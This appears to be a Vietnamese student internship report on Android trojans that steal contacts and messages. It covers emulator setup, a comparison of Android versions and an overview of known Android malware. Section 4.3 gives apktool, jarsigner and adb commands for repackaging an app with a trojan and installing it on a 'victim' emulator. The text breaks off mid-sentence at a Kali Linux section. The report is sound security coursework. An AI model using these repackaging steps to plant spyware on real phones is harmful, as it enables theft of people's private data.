SlideShare a Scribd company logo
1 of 57
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN
KHOA KỸ THUẬT MÁY TÍNH
--------------------------------
BÁO CÁO ĐỀ TÀI THỰC TẬP
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH
CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN
ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
GVHD: VÕ ĐỖ THẮNG
SVTH: NGUYỄN DUY TÍN
MSSV: 10520044
LỚP : KTMT05
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
LỜI CẢM ƠN
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh chị nhân
viên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin chân thành
cám ơn Thầy Võ Đỗ Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóa
thực tập.
Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai
sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh nghiệm thực
tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận
được ý kiến đóng góp của Thầy để em học thêm được nhiều kinh nghiệm .
Em xin chân thành cảm ơn !
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
ĐÁNH GIÁ CỦA GVHD:
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
............................................................................................................................................................
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
MỤC LỤC
LỜI CẢM ƠN......................................................................................................................2
ĐÁNH GIÁ CỦA GVHD: ..................................................................................................3
LỊCH LÀM VIỆC TẠI TRUNG TÂM ...............................................................................5
GIỚI THIỆU TRUNG TÂM ATHENA..............................................................................5
NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO ...............................................................7
I. NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP. ............8
1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập....................................8
1.1 Cài đặt Java trên máy tính. .....................................................................................8
1.2 Download và Cài đặt Eclipse, Android SDK. ........................................................9
1.3 Tạo máy AVD (Android Virtual Device).............................................................12
2. SO SÁNH SỰ KHÁC NHAU GIỮA CÁC PHIÊN BẢN ANDROID........................16
2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt......................................16
2.2. Sự khác nhau về giao diện..................................................................................17
2.3. Sự khác nhau về tính năng. ................................................................................18
2.4. Sự khác nhau về giao thức mạng. .......................................................................18
3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)...18
4. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar).............19
4.1. Thực trạng............................................................................................................19
4.2. Nghiên cứu lỗ hổng bảo mật trên Android.............................................................20
4.3. Cài đặt trojan trên Android (iCalendar) .................................................................21
5. NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID ..23
5.1 Tìm hiểu Kali Linux ...............................................................................................23
5.2 Cài đặt Kali Linux trên máy ảo VMWare................................................................24
5.3 Tạo mã độc trên Kali Linux để xâm nhập Android ..............................................32
II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET........................................................45
1.TRIỂN KHAI LÊN VPS.............................................................................................45
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
1.1 Cài đặt Metasploit lên VPS...................................................................................45
2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET...............................................52
KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP ............................................................57
LỊCH LÀM VIỆC TẠI TRUNG TÂM
Sáng thứ 2 4 6 từ 10h đến 14h
Bắt đầu từ ngày 5/3 đến kết thúc 24/5
GIỚI THIỆU TRUNG TÂM ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành
lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc
đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển
nước nhà .
Lĩnh vực hoạt động chính:
+Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị
mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi
tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung
tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng
của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan
chính phủ, tổ chức tài chính..
+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên
gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như
Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền
Thông các tỉnh, bưu điện các tỉnh,.,....
+ Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác
và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp
hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......
Đội ngũ giảng viên :
+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng
đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như
MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft
Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia
giảng dạy tại trung tâm ATHENA
+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công
nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các
công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA
Cơ sở vật chất:
+Thiết bị đầy đủ và hiện đại
+Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ
mới nhất.
+Phòng máy rộng rãi, thoáng mát
Dịch vụ hỗ trợ:
+Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
+Giới thiệu việc làm cho mọi học viên
+Thực tập có lương cho học viên khá giỏi
+Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời
gian.
+Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng
máy tính, bảo mật mạng
+Hỗ trợ thi Chứng chỉ Quốc tế.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO
Phần 1
1.Cài đặt Android trên máy ảo
2.So sánh tính năng Android 2x và 4x
3.Nghiên cứu cài đặt Backdoor, Trojan cho phép nghe lén điện thoại
4.Nghiên cứu các chương trình có mã độc(iealender)
5.Nghien cứu Kali-Linux, các cơ chế tạo mã độc trên Kali-Linux==>> xâm nhập thẻ
sdcard, kích hoạt camera,ghi âm trên thiết bị Andoid
6.Truyền dữ liệu trên thẻ sdcard, camera, về máy điều khiển từ xa
Phần 2
1.Hướng dẫn cài đặt Metasploit lên VPS
2. Sử dụng VPS để tấn công Android trên phạm vi Internet
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
I. NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP.
1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập.
1.1 Cài đặt Java trên máy tính.
Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ
JDK. Bạn có thể download bộ JDK tại địa chỉ : tại đây.
(Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download cho phù
hợp)
Sau khi tải bộ JDK về máy. các bạn tiến hành cài đặt chúng.
Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next…
Và đợi cho tới khi quá trình cài đặt hoàn tất.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đã cài được trên máy tính của
bạn chưa bẳng cách vào CMD và gõ lệnh: “java”
Nếu màn hình hiện ra như sau là bạn đã hoàn thành rồi:
1.2 Download và Cài đặt Eclipse, Android SDK.
Trước tiên ta phải download bộ Eclipse.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Các bạn vào địa chỉ : http://developer.android.com/sdk/index.html
Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle for
Windows
Sau khi download về, các bạn giải nén ra và sẽ có các file như sau :
Để cài đặt Android SDK các bạn có 2 cách:
Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài đặt.
Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager cũng
được:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sẽ xuất hiện 1 cửa sổ mới như sau :
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào nút
:Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong.
1.3 Tạo máy AVD (Android Virtual Device).
Đầu tiên bạn khởi chạy Eclipse lên.
Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần hướng
dẫn trước.
Hoặc bạn cũng có thể tham khảo thêm tạo 1 máy ảo Android trên Virtualbox mình đã
hướng dẫn chi tiết ở bài trước.
Sau khi khởi chạy xong Eclipse. Bạn vào : Windows ->Android Virtual
Device Manager.
Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Click vào New để tạo mới :
Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” mà thôi.
Target : Bạn chọn phiên bản Android để test.
SD Card : Là dung lượng bộ nhớ ảo của thẻ SD.
Và một số thông tin khác…
Các bạn click OK để hoàn thành tạo mới một AVD.
Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tên
máy ảo mới mình vừa tạo rồi.
Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảo
khởi chạy) :
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Và đây là giao diện cuối cùng :
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
2. SO SÁNH SỰ KHÁC NHAU GIỮA CÁC PHIÊN BẢN ANDROID
2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.
Android 2.3 Android 4x
Cần ít nhất 128 MB bộ nhớ có sẵn cho
Kernel và cho không gian người sử dụng
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel
và cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là
150MB
Dung lượng Ram tối thiểu cần thiết là 350
MB
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5
inch
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến
1,779 (16:9)
- Công nghệ màn hình được sử dụng là
công nghệ “ Square pixels”
Màn hình:
- Màn hình phải có kích cỡ ít nhất
426x320
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85
(16:9)
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải
dữ liệu.Trình quản lí download phải có khả
năng tải tập tin có dung lượng ít nhất 55 MB
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải
dữ liệu.Trình quản lí download phải có khả
năng tải tập tin có dung lượng ít nhất 100
MB
2.2. Sự khác nhau về giao diện.
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm
ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu
lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn
ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng
rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên
trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng
dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn
hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho
phép người dùng lái xe đua bằng xoay thiết bị, giống như Các thiết bị Android sau khi
khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên
thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn
hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng
ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động,
cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những
mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem
được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có
thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi
của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các
kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính,
thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn.
Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi
của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn
hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng
thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc
cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián
đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng
có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ
mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người
dùng đã đọc hoặc xóa nó đi.
Android 2.3 Android 4x
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt
hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom
Không có widget menu Có Widget menu giúp tìm nhanh thông tin
mà không cần mở ứng dụng
2.3. Sự khác nhau về tính năng.
Android 2.3 Android 4x
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và
Tablet
Chỉ có thể xóa tất các các thông báo cùng
lúc trên trình quản lý
Chỉ có thể xóa riêng rẽ các thông báo cùng
lúc trên trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi màn
hình bị khóa
Có thể thực hiện thêm 1 số tính năng khi
màn hình bị khoái ngoài trả lời , ngắt cuộc
gọi như gửi tin nhắn
Không có tính năng mở khóa màn hình nhận
diện khuôn mặt
Có tính năng mở khóa màn hình nhận diện
khuôn mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận
diện được tất cả các camera trên thiết bị
2.4. Sự khác nhau về giao thức mạng.
Android 2.3 Android 4x
Không hỗ trợ giao thức https Hỗ trợ giao thức https
3. NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH)
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm
4. NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar)
4.1. Thực trạng
Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên
Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc
mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android.
Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của Google vừa
được hãng bảo mật Kaspersky Lab công bố.
Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để
sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin
nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông
tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép,
….. Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát tán trên
Android trong quý I năm 2013.
Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng
các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013,
Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di động bằng tổng
số lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh
hưởng nặng nhất.
Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại
mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo
mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng
thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã
độc được phát tán dễ dàng hơn trên nền tảng di động này.
Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý
I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu
dựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link có
chứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như
Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của
hacker.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
4.2. Nghiên cứu lỗ hổng bảo mật trên Android.
4.2.1. Malware trên Android.
Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm
máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử
dụng không hề hay biết.
Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ
dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây
lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động
giống như một phần mềm gián điệp (Trojan) hơn là một virus
phá hủy.
4.2.2 Cơ chế hoạt động của Malware.
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware
DroidDream. Malware này hoạt động qua 2 giai đoạn:
- Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng
chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết
bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
- Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép
quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin
nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi
DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một
ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài
đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng
dụng mà không được phép.
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây
nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm,
checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là
Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào
khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện
thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn
trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.
Mục đích của Malware DroidDream
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của
con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng
tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp
thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được
tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng,
việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người
dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra
các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS
gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware
này.
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại.
Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một
theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an
sự an toàn của người dùng hệ điều hành này.
4.3. Cài đặt trojan trên Android (iCalendar)
1.Dùng công cụ apktool để chỉnh sửa file apk
apktool if name.apk
apktool d name.apk
apktool b name
2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng
keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA -
keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name-
name.keystore name.apk name
jarsigner -verify -verbose -certs name.apk
3.Cài đặt ứng dụng lên máy nạn nhân
adb -s emulator-device install name.apk
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
5. NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID
5.1 Tìm hiểu Kali Linux
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra
bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là
